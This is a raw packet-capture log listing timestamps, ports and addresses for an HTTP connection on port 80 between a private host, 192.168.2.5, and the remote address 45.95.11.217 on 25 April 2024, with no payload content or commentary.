Apr 25, 2024 22:47:48.341388941 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341408968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341412067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341423035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341435909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341468096 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341562033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341573000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341605902 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341628075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341639042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341639042 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341660976 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341676950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341722965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341733932 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341770887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341869116 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341897964 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341912031 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.342139959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.342154980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.342180967 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.342231989 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.342247009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.342258930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.342298031 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.343739033 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.347695112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.347733974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.347744942 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.347754002 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.347783089 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.347846031 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.347877979 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.348494053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.348612070 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.348635912 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.348669052 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.348911047 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.348948956 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.348992109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.349024057 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.363811970 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.363826036 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.363837004 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.363867998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.363879919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.363945961 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.363980055 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.364000082 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.364617109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.364727974 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.572531939 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572549105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572576046 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572637081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572657108 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.572705984 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.572812080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572824001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.572873116 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.572911024 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573543072 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573576927 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.573659897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573733091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573762894 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.573772907 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573803902 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573829889 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573831081 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.573918104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.573952913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.573961020 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.574012041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.574043989 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.574126005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.575144053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.575186968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.579274893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.579348087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.579389095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.579397917 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.579437017 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.579469919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.580796003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.580809116 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.580854893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.580971003 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596210003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596246004 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596311092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596311092 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596353054 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596358061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596401930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596434116 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596488953 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596537113 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596565962 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596582890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596594095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596620083 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596635103 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596663952 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596690893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596692085 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596724033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596750021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596771955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596816063 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.596842051 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.596895933 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.597543955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.597585917 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.803669930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803714991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803761005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803813934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803837061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.803884029 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.803888083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803900003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.803945065 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.804167032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804210901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804245949 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.804593086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804635048 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804665089 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.804730892 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804761887 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804794073 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.804806948 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804897070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.804929972 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.805408001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.805447102 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.805473089 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.805485010 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.805516005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.805547953 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.809529066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.809586048 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.809604883 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.809644938 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.809674025 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.809712887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827069044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827131033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827178955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827224016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827313900 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827353954 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827405930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827459097 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827495098 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827552080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827608109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827649117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827651024 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827716112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827729940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827749968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827765942 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827800035 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827833891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827877998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827914000 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.827922106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827960968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.827972889 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828016996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828036070 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.828058958 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.828095913 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828154087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828191042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.828708887 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828723907 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.828772068 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.034750938 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034775019 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034817934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034835100 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034878016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034879923 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.034921885 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.034945965 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.034955025 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.035464048 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035506964 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035518885 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035546064 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.035571098 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035605907 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035607100 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.035701990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035743952 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.035866022 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.035959959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.036000967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.036005020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.036019087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.036052942 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.036606073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.036640882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.036679029 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.040935040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.040967941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.041013002 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.041018963 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.041043997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.041080952 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.041182995 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.041227102 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.041269064 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.058446884 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.058514118 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.058568954 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.058569908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.058583021 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.058619022 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.061639071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061697006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061717033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061755896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.061774015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061794996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061811924 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.061836004 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061849117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061877012 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061886072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.061920881 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.061929941 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.061964989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062002897 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.062002897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062022924 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062043905 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062072992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.062107086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062119007 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062144041 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.062160969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062203884 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.062236071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062249899 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062262058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.062288046 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.109453917 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.265115023 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265144110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265311003 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.265331030 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265346050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265389919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.265408039 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265444040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265482903 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265496969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265541077 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265597105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265599012 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.265611887 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265634060 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.265973091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265988111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.265994072 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.266038895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.266060114 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.266724110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.266748905 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.266777992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.266849995 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.266890049 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.271073103 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271086931 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271100044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271112919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271125078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271136999 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.271188021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.271228075 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.288028955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.288053989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.288072109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.288090944 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.288189888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.288218021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291090965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291110039 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291135073 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291184902 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291343927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291372061 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291388988 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291407108 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291425943 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291461945 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291481018 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291520119 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291567087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291604996 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291646957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291665077 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291696072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291711092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291714907 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291749001 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291752100 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291773081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291789055 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291790009 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291814089 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291830063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.291836977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.291870117 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.341404915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.341444016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.341497898 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.341541052 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.341553926 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.341619015 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.341656923 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.341697931 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494299889 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494328976 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494406939 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494426012 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494453907 CEST	80	49706	45.95.11.217	192.168.2.5
